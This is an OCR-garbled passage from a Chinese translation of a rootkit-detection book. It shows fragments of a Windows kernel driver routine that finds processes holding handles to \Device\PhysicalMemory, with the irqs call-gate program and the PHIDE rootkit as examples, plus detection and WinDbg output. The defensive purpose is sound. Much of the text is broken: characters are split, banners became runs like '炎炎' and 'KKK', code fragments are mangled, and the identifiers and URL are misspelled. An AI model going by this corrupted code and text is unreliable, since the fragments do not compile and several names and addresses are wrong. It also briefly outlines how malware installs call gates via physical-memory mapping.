if (objNameResolutionFail) 


{ 


ExFreePoolWithTag(obi,MY_ TAG) ; 
ExFreePoolWithTag(oti,MY TAG) ; 
ZwClose (hDuplicateObject) ; 


ZwClose(hProcess) ; 


(*nameFailCount) ++; 
return FALSE; 


else 


{ 
} 


ExFreePoolWithTag (obi,MY TAG) ; 
ExFreePoolWithTag (oti,MY TAG) ; 

ExFreePoolWithTag (nameBuff,MY_ TAG) ; 

ZwClose (hDuplicateObject) ; ZwClose (hProcess) ; 
return TRUE; 


RtlInitUnicodeString(ObjectName, (PWCHAR) nameBuff [1] ) ; 


关于 GetHandlelnfo () 函数 还 要 注意 一 点 ， 它 有 时 无 法 获取 一 个 成 功 读 取 的 句柄 的 名 称 (我 们 的 测试 显示 平均 失败 率 大 约 
为 12%) 。 这 有 多 种 原因 ， 比 如 权限 不 足 (对 象 可 能 需要 特殊 的 权限 ) ， 对 象 没 有 名 称 ， 或 者 对 象 在 我 们 完成 请 求 之 前 被 释放 。 
这 是 尝试 查询 一 组 实时 对 象 的 副作用 。 前 面 已 经 提 到 过 ， 更 稳定 的 方法 是 注册 一 个 回调 例 程 ， 获 得 新 对 象 的 自动 通知 。 注 意 ， 没 
有 对 象 名 称 ， 我 们 的 检测 方法 就 会 失败 。 

接 下 来 ,我们 将 说 明 如 何 使 用 这 些 检测 代码 来 发 现 \\Device\PhysicalMemory 对 象 的 侵害 ， 使 用 的 实例 是 并 不 出 名 的 
irqs (http://www.codeproject.com/KB/system/soviet_kernel hack.aspx) 。 这 个 实例 在 用 户 模式 下 安装 一 个 调用 门 ， 然 后 
试图 通过 这 个 调用 门 获得 APIC 中 断 信 息 。 它 通过 将 RAM 的 每 个 物理 页 面 映 射 到 自己 的 进程 地 址 空间 ， 搜 索 存 储 全 局 描述 符 表 
(GDT) 的 物理 内 存 页 面 地 址 来 安装 调用 门 。 找 到 该 地 址 后 ， 将 一 个 调用 门 写 入 GDT 中 的 新 项 目 。 然 后 可 以 使 用 调用 门 来 收集 
APIC 中 断 信息 。 


注意 : 我 们 的 检测 代码 对 其 他 恶意 方法 也 有 效 ， 例 如 ，90210 开 发 的 PHIDE Rootkit， 这 个 Rootkit 使 用 


\NDevice\PhysicalMemoty 从 用 户 模式 安装 一 个 调用 门 来 提升 权限 并 且 隐 藏 进程 和 文件 。 


在 未 受 感染 的 系统 上 我 们 的 检测 例 程 输出 如 下 : 


DriverEntry(): [0] Looking for processes with a handle open 

to \Device\PhysicalMemory.. 

FindPhysmemHandles () : [0] Found 4514 handles. 

FindPhysmemHandles ( Warning: 666 name resolution failures and 0 other failures. 


): 
FindPhysmemHandles(): Found 0 open handles to \\Device\PhysicalMemory. 
DriverEntry(): [0] Complete. 


执行 irqs 程 序 之 后 ， 它 使 用 未 写 入 文档 的 函数 NtMapViewOfsection () 开始 映射 物理 内 存 地 址 。 这 个 进程 密集 而 缓慢 ; 
因此 ， 我 们 有 大 量 的 时 间 可 以 执行 自己 的 检测 实用 程序 〈 记 住 ， 目 标 进程 必须 维持 一 个 指向 \Device\PhysicalMemory 的 句柄 
会 被 发 现 ) 。 下 面 的 输出 摘要 展示 了 我 们 的 检测 工具 在 irqs 程 序 运行 时 发 现 的 打开 句柄 : 


炎炎 炎炎 炎炎 类 类 大大 大 类 大 大 炎炎 大 大 大大 火炎 火炎 火炎 火炎 类 大火 大大 大 大 大 大 类 大 大 大 大 大 炎炎 火炎 炎炎 火炎 火炎 大 火炎 火炎 类 大 大 大 类 大 大 大 大 大 大 大 大 大 大 大 大 大 大 类 大 


* A driver is mapping physical memory 001A9000->001A9FFF 

* that it does not own. This can cause internal CPU corruption. 
* A checked build will stop in the kernel debugger 

* so this problem can be fully debugged. 


次 炎炎 炎炎 大大 类 大 大 大 大 类 大 大 大 大 大 大 大 大 火炎 大 火炎 火炎 大 大 大 大 大 大 大 大 大 大 大 大 大 大 大 大 大 火炎 炎炎 大 大 炎炎 炎炎 火炎 类 大大 大 大 大 炎炎 大 大 大 大 大 大 大 大 大 大 大 大 大 大 


DriverEntry(): [0] Looking for processes with a handle open 

to \\Device\PhysicalMemory.. 

FindPhysmemHandles(): [0] Found 3724 handles. 

FindPhysmemHandles(): Process 508 has a handle open to \\Device\PhysicalMemory!!. 
FindPhysmemHandles(): Warning: 616 name resolution failures and 0 other failures. 
FindPhysmemHandles(): Found 1 open handle to 
\\Device\PhysicalMemory.DriverEntry(): [0] Complete. 


炎炎 炎炎 火炎 次 次 次 次 炎炎 炎炎 炎炎 炎炎 炎炎 火炎 火炎 炎炎 炎炎 炎炎 炎炎 次 炎炎 炎炎 次 次 炎炎 炎炎 炎炎 炎炎 炎炎 火炎 火炎 炎炎 火炎 炎炎 炎炎 次 次 次 次 炎炎 炎炎 炎炎 火炎 炎炎 炎炎 火炎 


* A driver is mapping physical memory 001AA000->001AAFFF 

* that it does not own. This can cause internal CPU corruption. 
* A checked build will stop in the kernel debugger 

* so this problem can be fully debugged. 


KREKKKKKKEKKEKKEKKEKRKEKE KKK KR KEKE KKK KEK KEKE KEKE KKK KEKE KKK KEK KRKEKR KEKE KKKEKKKEKEKEKEKEKKEKEKKEKKKKEKKKKEKKEKKEKEE 


从 这 个 输出 中 ， 我 们 能 够 知道 进程 #508 使 用 这 个 段 对 象 。 我 们 可 以 使 用 WinDbg 的 ! process 扩 展 命令 并 指定 508 的 十 入 进 
制 值 (0x1fc) ， 来 验证 这 个 进程 的 标识 : 


kd> !process Oxlfc 7 


Searching for Process with Cid == lfc 
Cid Handle table at e1003000 with 281 Entries in use 
PROCESS 81a1a468 SessionId: 0 Cid: Olfc Peb: 7ffdf000 ParentCid: 00dc 


DirBase: 138a4000 ObjectTable: e1839188 HandleCount: 29. 

Image: irgs.exe 

VadRoot 81a570f8 Vads 37 Clone 0 Private 57. Modified 0. Locked 0. 
DeviceMap e17e4520 


Token e19ecd78 
ElapsedTime 00:00:18.165 
UserTime 00:00:00.030 
KernelTime 00:00:10.064 
QuotaPoolUsage [PagedPool] 17252 
QuotaPoolUsage [NonPagedPool1] 1480 
Working Set Sizes (now,min, max) (278, 50, 345) (1112KB, 200KB, 1380KB) 
PeakWorkingSetSize 278 
VirtualSize 15 Mb 
PeakVirtualSize 15 Mb 
PageFaultCount 275 
MemoryPriority BACKGROUND 
BasePriority 8 
CommitCharge 129 


注意 ， 星 号 包围 的 调试 信息 是 内 核发 送 的 ， 指 出 irqs 程 序 映射 了 它 所 不 应 该 访问 的 核心 内 存 。 


A.6 ”Rootkit 检 测 工具 样 例 


我 们 已 经 发 行 了 一 个 名 为 Codeword 的 Rootkit 监 测 工具 ， 读 者 可 以 免费 使 用 。 该 工具 可 以 
在 https://code/google.com/archive/p/codeword/ 上 找到 。 


